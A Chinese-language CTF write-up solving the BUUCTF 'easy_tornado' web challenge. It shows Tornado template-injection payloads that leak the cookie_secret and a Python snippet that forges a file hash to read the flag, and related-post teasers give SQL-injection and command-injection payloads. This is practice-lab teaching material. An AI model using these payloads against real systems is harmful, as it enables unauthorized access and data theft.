当前位置:首页 > CTF > BUU > 正文内容

BUUCTF_web_第11题:[护网杯 2018]easy_tornado

七星4年前 (2021-01-22)BUU1732


开靶场, 有三个文件链接,依次点开, 有个提示:

flag in /fllllllllllllag

然后观察url发现,访问文件是需要提交一个filehash值的:

/file?filename=/flag.txt&filehash=dd0615f233fad6361566815aa4ee40c0

是一串md5,再看看hint.txt这个文件:

md5(cookie_secret+md5(filename))

我们需要知道的是cookie_secret.

还有个welcome.txt文件, 给的提示是render

render是python的渲染函数,也就是一种模板,所以可能存在模板注入

尝试访问一下下/fllllllllllllag文件,得到了报错url

/error?msg=Error

msg会返回他的值,测试:

/error?msg={{4*4}}

返回ORZ,模板注入实锤了.

在模板中, 存在一些可以访问的快速对象,

这里用到的是handler.settings

handler 指向RequestHandler

而RequestHandler.settings又指向self.application.settings

所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量:

/error?msg={{handler.settings}}

得到:

{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'e2a54be9-b2db-4fa4-a58b-8c2ac8d89bb2'}

然后把就直接通过md5(cookie_secret+md5(filename))构造出来了payload:

import hashlib
hashlib.new('md5',str('e2a54be9-b2db-4fa4-a58b-8c2ac8d89bb2'+str(hashlib.new('md5',b'/fllllllllllllag').hexdigest())).encode(encoding='UTF-8')).hexdigest()

得到/fllllllllllllag文件的filehash, 然后直接拼接访问,get弗拉格



七星比特|qixingbit.com

相关文章

BUUCTF_web_第二题:[强网杯 2019]随便注

BUUCTF_web_第二题:[强网杯 2019]随便注

第二题: [强网杯 2019]随便注 测试一下, 1'# 返回正常, 发现是字符注入,尝试show一下database: 1';show databases;%23 发现出结果了:...

 BUUCTF_web_第三题:[极客大挑战 2019]EasySQL

BUUCTF_web_第三题:[极客大挑战 2019]EasySQL

第三题: [极客大挑战 2019]EasySQL 常规SQL注入, 没啥说的, 好多种解法, 既然是登录, 这里就写一个万能用户: 1' or 1=1# 密码随便填, 就能getflag...

BUUCTF_web_第四题:[极客大挑战 2019]Havefun

BUUCTF_web_第四题:[极客大挑战 2019]Havefun

开局一直猫, flag全靠f12:<!--˂!----˃$cat=$_GET['cat'];echo $cat;if($cat=='dog'){    echo 'Syc{c...

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

f12, 获得Archive_room.php访问, 嗯, 他说什么什么快没看清, 不要紧, 我们可以让他慢下来开burpsuite, 抓取回显包, 得到secr3t.php访问,成功获得源码high...

BUUCTF_web_第八题:[极客大挑战 2019]LoveSQL

BUUCTF_web_第八题:[极客大挑战 2019]LoveSQL

打开之后, 和之前的类似, 万能密码 1' or 1=1#登录成功,给了一个admin和一串md5, md5解密失败.只能常规注入了.给了个灵魂试探:用 sqlmap 是没有灵魂的那就手工注入一下,巩...

BUUCTF_web_第九题:[GXYCTF2019]Ping Ping Ping

BUUCTF_web_第九题:[GXYCTF2019]Ping Ping Ping

是个ping, 传入/?ip=127.0.0.1看看命令执行, 立刻想到||管道符:/?ip=127.0.0.1||ls不行, 那就封号;/?ip=127.0.0.1;ls成功获得两个文件名flag....

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。